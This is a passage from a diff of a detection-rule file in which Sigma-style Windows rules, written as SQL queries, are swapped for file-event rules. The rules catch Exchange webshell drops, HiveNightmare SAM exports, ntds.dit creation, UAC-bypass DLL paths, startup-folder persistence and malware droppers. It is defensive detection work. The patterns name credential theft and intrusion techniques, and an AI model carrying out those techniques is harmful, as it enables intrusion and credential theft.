(NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_security_alert_active_directory_user_control.yml" + "filename": "file_event_win_exchange_webshell_drop_suspicious.yml" }, { - "title": "RDP Login from Localhost", - "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "title": "Suspicious VHD Image Download From Browser", + "id": "8468111a-ef07-4654-903b-b863a80bbc95", "status": "test", - "description": "RDP login with localhost source address may be a tunnelled login", - "author": "Thomas Patzke", + "description": "Detects creation of \".vhd\"/\".vhdx\" files by browser processes.\nMalware can use mountable Virtual Hard Disk \".vhd\" files to encapsulate payloads and evade security controls.\n", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "tags": [ - "attack.lateral_movement", - "car.2013-07-002", - "attack.t1021.001" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Legitimate downloads of \".vhd\" files would also trigger this" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName 
LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\') AND TargetFilename LIKE '%.vhd%' ESCAPE '\\')" ], - "filename": "win_security_rdp_localhost_login.yml" + "filename": "file_event_win_mal_vhd_download.yml" }, { - "title": "Suspicious Computer Account Name Change CVE-2021-42287", - "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", - "status": "test", - "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", - "author": "Florian Roth (Nextron Systems)", + "title": "Creation of an WerFault.exe in Unusual Folder", + "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "status": "experimental", + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "author": "frack113", + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" + "filename": "file_event_win_werfault_dll_hijacking.yml" }, { - "title": "SysKey Registry Keys Access", - "id": 
"9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", + "title": "Typical HiveNightmare SAM File Export", + "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", "status": "test", - "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects files written by the different tools that exploit HiveNightmare", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" ], "falsepositives": [ - "Unknown" + "Files that accidentally contain these strings" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\')" ], - "filename": "win_security_syskey_registry_access.yml" + "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" }, { - "title": "User Added to Local Administrators", - "id": "c265cf08-3f99-46c1-8d59-328247057d57", - "status": "stable", - "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Startup Folder Persistence", + "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "status": 
"experimental", + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1078", "attack.persistence", - "attack.t1098" + "attack.t1547.001" ], "falsepositives": [ - "Legitimate administrative activity" + "Rare legitimate usage of some of the extensions mentioned in the rule" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4732' AND (TargetUserName LIKE 'Administr%' ESCAPE '\\' OR TargetSid = 'S-1-5-32-544')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" ], - "filename": "win_security_user_added_to_local_administrators.yml" + "filename": "file_event_win_susp_startup_folder_persistence.yml" }, { - "title": "Suspicious Outbound Kerberos Connection - Security", - "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "UAC Bypass Using IDiagnostic Profile - File", + "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "status": "experimental", + "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass 
technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1558.003" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Web Browsers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_susp_outbound_kerberos_connection.yml" + "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Register new Logon Process by Rubeus", - "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", - "status": "test", - "description": "Detects potential use of Rubeus via registered new trusted logon process", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", + "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "status": "experimental", + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "author": "frack113", "tags": [ - "attack.lateral_movement", + "attack.persistence", 
"attack.privilege_escalation", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" ], - "filename": "win_security_register_new_logon_process_by_rubeus.yml" + "filename": "file_event_win_iphlpapi_dll_sideloading.yml" }, { - "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", - "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", - "status": "test", - "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", - "author": "Orlinum , BlueDefenZer", + "title": "Legitimate Application Dropped Script", + "id": "7d604714-e071-49ff-8726-edeb95a70679", + "status": "experimental", + "description": "Detects programs on a Windows system that should not write scripts to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE 
'%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + "filename": "file_event_win_legitimate_app_dropping_script.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Registry", - "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", + "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded 
.NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.execution", + "attack.privilege_escalation", + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\'" ], - "filename": "win_security_dot_net_etw_tamper.yml" + "filename": "file_event_win_cve_2021_1675_printspooler.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Security", - "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Potential Winnti Dropper Activity", + "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "status": "test", + "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' 
ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" + "filename": "file_event_win_redmimicry_winnti_filedrop.yml" }, { - "title": "Reconnaissance Activity", - "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "title": "ISO or Image Mount Indicator in Recent Files", + "id": "4358e5a5-7542-4dcb-b9f3-87667371839b", "status": "test", - "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", - "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", - "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1069.002", - "attack.s0039" - ], + "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Administrator activity" + "Cases in which a user mounts an image file for legitimate reasons" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.iso.lnk' ESCAPE '\\' OR 
TargetFilename LIKE '%.img.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhd.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhdx.lnk' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')" ], - "filename": "win_security_susp_net_recon_activity.yml" + "filename": "file_event_win_iso_file_recent.yml" }, { - "title": "First Time Seen Remote Named Pipe", - "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "title": "Suspicious Creation TXT File in User Desktop", + "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", "status": "test", - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", - "author": "Samir Bousseaden", + "description": "Ransomware create txt file in the user Desktop", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR 
RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" ], - "filename": "win_security_lm_namedpipe.yml" + "filename": "file_event_win_susp_desktop_txt.yml" }, { - "title": "Possible PetitPotam Coerce Authentication Attempt", - "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", - "status": "experimental", - "description": "Detect PetitPotam coerced authentication activity.", - "author": "Mauricio Velazco, Michael Haag", + "title": "UAC Bypass Using NTFS Reparse Point - File", + "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "status": "test", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1187" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unknown. Feedback welcomed." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" ], - "filename": "win_security_petitpotam_network_share.yml" + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "Potential Privileged System Service Operation - SeLoadDriverPrivilege", - "id": "f63508a0-c809-4435-b3be-ed819394d612", + "title": "Suspicious ADSI-Cache Usage By Unknown Tool", + "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "status": "test", - "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. 
A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers." + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4673' AND PrivilegeList = 'SeLoadDriverPrivilege' AND Service = '-') AND NOT (((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\fltMC.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\HelpPane.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\mmc.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wimserv.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR ((ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE 
'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" ], - "filename": "win_security_user_driver_loaded.yml" + "filename": "file_event_win_susp_adsi_cache_usage.yml" }, { - "title": "Persistence and Execution at Scale via GPO Scheduled Task", - "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", + "title": "Suspicious NTDS.DIT Creation", + "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", "status": "test", - "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", - "author": "Samir Bousseaden", + "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1053.005" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "If the source IP 
